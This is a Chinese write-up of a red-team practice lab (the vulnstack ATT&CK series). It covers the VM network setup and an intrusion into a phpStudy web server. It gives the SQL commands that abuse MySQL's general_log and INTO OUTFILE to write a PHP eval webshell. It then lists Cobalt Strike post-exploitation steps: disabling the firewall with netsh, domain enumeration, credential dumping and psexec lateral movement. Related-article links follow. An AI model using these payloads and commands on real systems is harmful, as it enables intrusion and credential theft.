环境下载

下载靶场环境,并导入虚拟机
分别是win2003、win7、winserver2008

配置网络

虚拟机——编辑——虚拟机网络编辑器——添加网络VMnet2——仅主机模式
分配的地址是192.168.52.0

配置好地址后,需要将win2003和winserver2008的网卡设置为VMnet2

win7的网络需要两张,一张为VMnet2,一张为NAT(我这用的是台式机搭建靶场,笔记本作为攻击机,所以用的桥接网络)

**总结:win7为web服务器双网卡,通外网。win2003和2008为域内服务器。**
win7:192.168.0.105、192.168.52.143
win2003:192.168.52.138
win2008:192.168.52.141

外网渗透

1、已知目标的外网是192.168.0.105
2、扫描ip的端口,获得80和3306端口。

3、访问80端口
获得phpstudy探针,获得绝对路径,探测出数据库弱口令

 4、扫描192.168.0.105的目录

获得phpmyadmin目录

5、访问phpmyadmin
通过弱口令登录

6、通过日志写入webshell
SHOW VARIABLES LIKE '%general%' #查看日志

set global general_log = "ON" #开启日志记录

set global general_log_file = "D:/phpStudy/WWW/shell.php" #指定日志文件

select "<?php eval($_POST['123'])?>"; #写入webshell

访问webshell

使用蚁剑连接木马

7、phpmyadmin的getshell方法

(1)Select into Outfile:这种方法涉及使用“SELECT … INTO OUTFILE”SQL语句将webshell写入服务器上的文件。攻击者必须知道webroot的绝对路径并具有对该目录的写权限。
show global variables like '%secure%' #root权限、绝对路径、secure_file_priv没具体值
       如果secure_file_priv的值为null,表示限制mysqld不允许导入或导出
       如果secure_file_priv的值为某个具体的目录路径(例如/tmp/),表示限制mysqld的导入或导出只能发生在该目录下
       如果secure_file_priv没有具体值,表示不对mysqld的导入或导出做限制
在MySQL 5.5之前,secure_file_priv默认是空,这个情况下可以向任意绝对路径写文件。但在MySQL 5.5之后,secure_file_priv默认是NULL,这个情况下不可以写文件

(2)日志文件操作:这种方法涉及操作MySQL日志文件以将webshell写入服务器上的文件。攻击者必须具有对日志文件目录的写权限并知道webroot的绝对路径
        SHOW VARIABLES LIKE '%general%' #查看日志
        set global general_log = "ON" #开启日志记录
        set global general_log_file = "D:/phpStudy/WWW/shell.php" #指定日志文件
        select "<?php eval($_POST['aaa']);?>"; #写入webshell

以上所有方法都需要满足某些条件,例如具有写权限并知道webroot的绝对路径

内网渗透

1、打开CS,生成监听器

2、创建木马程序,将目标上线cs

3、通过蚁剑将cs创建的木马上传

4、启动木马,上线cs

5、主机上线后

netsh advfirewall set allprofiles state off #关闭目标主机防火墙

ipconfig #查看信息,发现双网卡

net user #查看用户

提权

net view #查看计算机列表,并且会将其他计算机列入CS

net config Workstation #查看当前计算机名、域、登录域等

net view /domain #查看域

net localgruop administrators #查看域管

net tasklist #查看进程列表,是否存在杀软

net dclist #查看域控列表

提取凭证

提取明文密码

创建smb监听器

psexec

选择账号密码,监听器选择创建的smb,会话选择内网提权后的服务器

获得一台服务器的权限后,再次获得另一个内网服务器的权限并上线

新网站

phpmyadmin中看到有特殊的数据库,并且在蚁剑也看到不同的目录

获得新网站

公告信息获得敏感信息

打开后台弱口令登录

通过新建文件上传木马

在蚁剑获取到上传的目录

访问木马

连接木马

ATT&CK实战系列(一)的更多相关文章

  1. ATT&CK实战系列 红队实战(一)————环境搭建

    首先感谢红日安全团队分享的靶机实战环境.红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习.视频教程.博客三位一体学习. 靶机下载地址:http://vulnstack.qiyuanxue ...

  2. ATT&CK实战系列——红队实战(一)

    一.环境搭建 1.环境搭建测试 最近想要开始学习内网渗透,搜集了一些教程,准备先实验一个vulnstack靶机,熟悉一下内网渗透操作再学习基础知识. 靶场下载地址:http://vulnstack.q ...

  3. 【红日安全-VulnStack】ATT&CK实战系列——红队实战(二)

    一.环境搭建 1.1 靶场下载 靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 靶机通用密码:  1qaz@WSX 1.2 环境配置 ...

  4. ATT&CK实战系列——红队实战(二)

    一.环境搭建 靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ DC IP:10.10.10.10OS:Windows 2012应用:A ...

  5. ATT&CK 实战 - 红日安全 vulnstack (一) 环境部署

    靶场描述: 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习.视频教程.博客三位一体学习.另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环.后续也会搭建真实APT实 ...

  6. ATT&CK 实战 - 红日安全 vulnstack (二) 环境部署(劝退水文)

    靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 靶场简述 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习.视频教程.博 ...

  7. ATT&CK 实战 - 红日安全 vulnstack (一) 靶机渗透

    关于部署:https://www.cnblogs.com/Cl0ud/p/13688649.html PS:好菜,后来发现内网主机还是PING不通VM1,索性三台主机全部配成NAT模式,按照WEB靶机 ...

  8. 内网横向渗透 之 ATT&CK系列一 之 拿下域控制器

    信息收集 信息收集 域控制器的相关信息: 通过arp扫描发现域控制器的ip地址为:192.168.52.138,尝试使用msf的smb_login模块登录smb是否成功 1 search smb_lo ...

  9. 内网横向渗透 之 ATT&CK系列一 之 信息收集

    前言 靶机下载地址:ATT&CK 拓扑图: 通过模拟真实环境搭建的漏洞靶场,完全模拟ATK&CK攻击链路进行搭建,形成完整个闭环.虚拟机默认密码为hongrisec@2019. 环境搭 ...

  10. Spark入门实战系列--9.Spark图计算GraphX介绍及实例

    [注]该系列文章以及使用到安装包/测试数据 可以在<倾情大奉送--Spark入门实战系列>获取 .GraphX介绍 1.1 GraphX应用背景 Spark GraphX是一个分布式图处理 ...

随机推荐

  1. Konva.js

    1.前言 简介:Konva.js - 适用于桌面/移动端应用的 HTML5 2d canvas 库 个人体验:原生的canvas只支持绘制基本的直线,矩形,文字,图片,扇形等,如果要支持更复杂的功能, ...

  2. cockpit-325以及新版本安装和cockpit-files安装

    查看版本cockpit可安装版本,发现最新的只有310版本 sudo yum list cockpit --showduplicates Last metadata expiration check: ...

  3. Superpower:一个基于 C# 的文本解析工具开源项目

    推荐一个文本解析开源工具:Superpower,方便我们解析文本,比如解析日志文件.构建自己的编程语言还是其他需要精确解析和错误报告的场景. 01 项目简介 Superpower 的核心功能是将字符序 ...

  4. 【Python】数据分析与可视化实践:收支日统计数据可视化的实现

    Python数据分析与可视化实践:收支日统计数据可视化的实现 Author:萌狼蓝天 Date:2023-5-7 数据读入与基本处理 上图是原始数据的一部分,存放于excel中,首先使用pd读入数据. ...

  5. 【数据库】MongoDB服务启动失败的问题。

    1.确保MongoDB所在文件夹拥有所有权限 2.确保打开CMD窗口是以管理员身份运行的 3.配置文件中的路径应该为完整路径,且不包含空格和特殊字符(不建议包含) systemLog: destina ...

  6. Hutool excel导出

    easyExcel 文档不是很友好,所以转用hutool 工具导出excel,百度到的很多都没多少营养,略作总结,望君不吝赐教.该篇博客可以让你画出不是太复杂的excel 如:   image.png ...

  7. Netty中ByteBuf内存泄露及释放解析

    近日在使用Netty框架开发程序中出现了内存泄露的问题,百度加调试了一番,做个整理. 直接看解决方法请移步Netty内存泄漏解决ERROR io.netty.util.ResourceLeakDete ...

  8. MySQL百万级数据量分页查询方法及其优化

    1. 直接用limit start, count分页语句, 也是我程序中用的方法: select * from product limit start, count 当起始页较小时,查询没有性能问题, ...

  9. Windows10中安装了ubuntu虚拟机后xshell无法连接到ubuntu

    安装了ubuntu虚拟机后发现shell无法连接到ubuntu的排查步骤: 步骤 1: 检查虚拟机网络配置确认虚拟机网络模式:确认虚拟机的网络模式是否设置为桥接模式或NAT模式.桥接模式可以让你的虚拟 ...

  10. POST、GET、@RequestBody和@RequestParam区别

    参考链接: 1.POST.GET.@RequestBody和@RequestParam区别 2.@RequestBody的使用